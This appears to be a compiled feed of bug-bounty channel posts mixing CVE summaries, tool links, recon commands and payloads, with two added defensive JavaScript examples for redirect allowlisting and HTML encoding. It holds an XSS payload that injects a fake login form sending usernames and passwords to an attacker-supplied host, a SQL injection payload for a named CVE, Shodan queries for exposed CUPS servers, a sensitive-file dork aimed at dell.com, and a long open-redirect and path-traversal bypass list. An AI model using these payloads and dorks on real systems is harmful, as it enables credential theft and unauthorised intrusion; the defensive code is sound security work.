Exploiting Visual Studio via dump files - CVE-2024-30052
https://ynwarcs.github.io/exploiting-vs-dump-files
If you're into generating subdomains quickly 🚀
check out this website: husseinphp.github.io/subdomain/
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution
A remote unauthenticated attacker can silently replace existing printers' IPP URLs (or install new printers) with a malicious one, resulting in arbitrary command execution on the computer when a print job is started from that computer.
PoC: https://github.com/RickdeJager/cupshax
This PoC uses DNS-SD printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.
CUPS report and PoC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1
Reference: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
Finally working on this, and I will be back getting better and better, guys, so that I can help you understand how it really works...
For finding hidden parameters:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
⚡TOP 100 Vulnerabilities Step-by-Step Guide Handbook
https://github.com/Zorono/Learning-PDFs/blob/main/TOP%20100%20Vulnerabilities%20Step-by-Step%20Guide%20Handbook.pdf
Try this Google dork to find sensitive files on a website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
☄️Subowner - A simple Python-based tool to check for subdomain takeovers in mass scanning. Supports AWS, Fastly, Shopify, Azure, etc.
🚨https://github.com/ifconfig-me/subowner
💠 Introduction to SQL Injection
🔗 https://hacklido.com/blog/910-introduction-to-sql-injection
Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904
Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5
A payload to create a phishing page when you find an XSS vulnerability, such as stored XSS or DOM XSS:
'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱GitHub: 🔗 https://github.com/0xSpidey/writeup-miner
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
Write-Up - Telegram Anonymous Chat Hack Bot: https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5
SQL Injection
CVE: CVE-2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Fuzzing from First Principles
https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf
You can try these manual open redirect bypasses:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
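The list above is useful on the defending side as a regression suite: most of the entries exist because a redirect check compared strings ("does it start with our domain?") instead of resolving the value the way a browser will. The following is an added example, not code from the channel post or from any project it links: a server-side allowlist check for a `?next=` / `?redirect=` parameter written for Node.js 18+ with the WHATWG `URL` API. The names `safeRedirectPath`, `rejectedCount`, `SITE_ORIGIN` and the sample inputs are assumptions constructed for the example; the policy assumed is that the application only ever redirects within its own origin.

```javascript
// Added example (not code from the channel post): a server-side allowlist check
// for a "?next=" / "?redirect=" parameter, for Node.js 18+ using the WHATWG URL API.
// Assumption: the application only ever needs to redirect within its own origin,
// so anything resolving elsewhere is rejected outright rather than "sanitised".

const SITE_ORIGIN = 'https://example.com'; // constructed origin for the example

/**
 * Returns a same-origin path (pathname + search + hash) that can be placed in a
 * Location header, or null if the input resolves anywhere else.
 * Resolving the input against our own origin with the same parser a browser uses
 * collapses the tricks in the list above (protocol-relative //host, userinfo@host,
 * hex/octal/decimal IPs, javascript:, an http:// downgrade, odd ports) into one
 * concrete origin that can simply be compared.
 */
function safeRedirectPath(userInput, siteOrigin = SITE_ORIGIN) {
  if (typeof userInput !== 'string' || userInput.length === 0) return null;
  let target;
  try {
    target = new URL(userInput, siteOrigin); // relative inputs resolve against siteOrigin
  } catch {
    return null; // unparseable input (e.g. a %00 inside the host) is rejected
  }
  // A non-special scheme such as javascript: serialises its origin as "null",
  // so it fails this comparison just like a foreign host or a scheme downgrade.
  if (target.origin !== siteOrigin) return null;
  // Embedded credentials are never legitimate here, even when the host matches.
  if (target.username !== '' || target.password !== '') return null;
  // Hand back only the path part, re-serialised so it always starts with "/".
  return target.pathname + target.search + target.hash;
}

// Constructed sample inputs taken from the bypass list above; every one resolves
// off-origin and is expected to come back as null.
const OFF_ORIGIN_SAMPLES = [
  '//google.com/',
  '//GoOgLe.com/',
  '//google.com%00/',
  '//google.com@127.0.0.1/',
  '//0x7F000001/',
  'http://0177.0.0.1/',
  'http://3232235777',
  'http://[::1]/',
  'javascript:alert(1)//google.com',
  'https://admin:password@google.com/',
  'http://google.com:81/',
];

// Counts how many of the samples the check rejects, for a quick self-test.
function rejectedCount(samples = OFF_ORIGIN_SAMPLES) {
  return samples.filter((s) => safeRedirectPath(s) === null).length;
}

for (const s of OFF_ORIGIN_SAMPLES) {
  console.log(JSON.stringify(s), '->', safeRedirectPath(s));
}
console.log('/account?tab=security ->', safeRedirectPath('/account?tab=security'));
console.log('rejected', rejectedCount(), 'of', OFF_ORIGIN_SAMPLES.length);
```

The returned path must be written into the `Location` header as-is. The double-encoded entries in the list (`%252f%252fgoogle.com`) pass this check as a harmless local path, and only become a redirect if some later layer percent-decodes the value again before issuing the redirect, so keep decoding out of that path.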
How to Create a Fun, Engaging, and Long-Lasting Bug Bounty Program for Your Community: https://medium.com/@GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5
GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
https://github.com/securelayer7/CVE-2024-38856_Scanner
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap
Pentesting for Web Applications
https://www.hackerone.com/penetration-testing/web-applications
How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull's Bug Bounty…: https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5
XSS prevention steps from the front end.
Input Validation
The web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:
// Returns true when the value currently in the login form's email field matches
// the email-format regex. The selector relies on jQuery being loaded, and the
// `email` argument is not used: the field value is read directly from the DOM.
function validateEmail(email) {
  const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
  return re.test($("#login input[name=email]").val());
}
As we can see, this code tests the email input field and returns true or false depending on whether the value matches the regex for a valid email format.
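Format validation like the function above is one layer; the control that actually stops script from running is encoding untrusted data at the point where it is written into the page. The following is an added example, not the post's code: the same two front-end layers (a strict email check and HTML output encoding) as plain JavaScript with no jQuery dependency, plus a free-form field (a display name) where no format check is possible and encoding is the only defence. The names `isValidEmail`, `escapeHtml`, `renderConfirmation`, `renderGreeting` and all sample inputs are assumptions constructed for the example.

```javascript
// Added example (not code from the post): input validation and output encoding
// as two independent front-end XSS controls, in dependency-free JavaScript.
// All function names and sample inputs are constructed for this example.

// A deliberately strict email shape: the local part is limited to a small
// character set, so <, >, quotes, spaces and parentheses can never pass as an address.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$/;

function isValidEmail(value) {
  return typeof value === 'string' && value.length <= 254 && EMAIL_RE.test(value);
}

// Output encoding: every character that can open or close markup or an attribute
// value is replaced with its entity, so data stays data wherever it is rendered.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Builds the confirmation markup a form handler would inject into the page.
// Invalid input is never echoed back; valid input is still encoded, because
// validation and encoding are separate controls and only the latter blocks injection.
function renderConfirmation(email) {
  if (!isValidEmail(email)) {
    return '<p class="error">Please enter a valid email address.</p>';
  }
  return `<p>A login link has been sent to <b>${escapeHtml(email)}</b>.</p>`;
}

// A display name has no fixed format, so there is nothing to validate against;
// encoding on output is what keeps a name like "<img src=x onerror=...>" inert.
function renderGreeting(displayName) {
  return `<p>Welcome back, ${escapeHtml(displayName)}!</p>`;
}

// Constructed inputs: one legitimate address and one that embeds markup in the local part.
const SAMPLES = [
  'alice.smith+tag@mail.example.co.uk',
  '"><img src=x onerror=alert(1)>@example.com',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'valid:', isValidEmail(s));
}
console.log(renderConfirmation(SAMPLES[0]));
console.log(renderGreeting('<img src=x onerror=alert(1)>'));
```

When the result is placed into the document, prefer `textContent` or the encoded string over assigning raw input to `innerHTML`; the encoder above is for the cases where markup around the value is genuinely needed.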
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643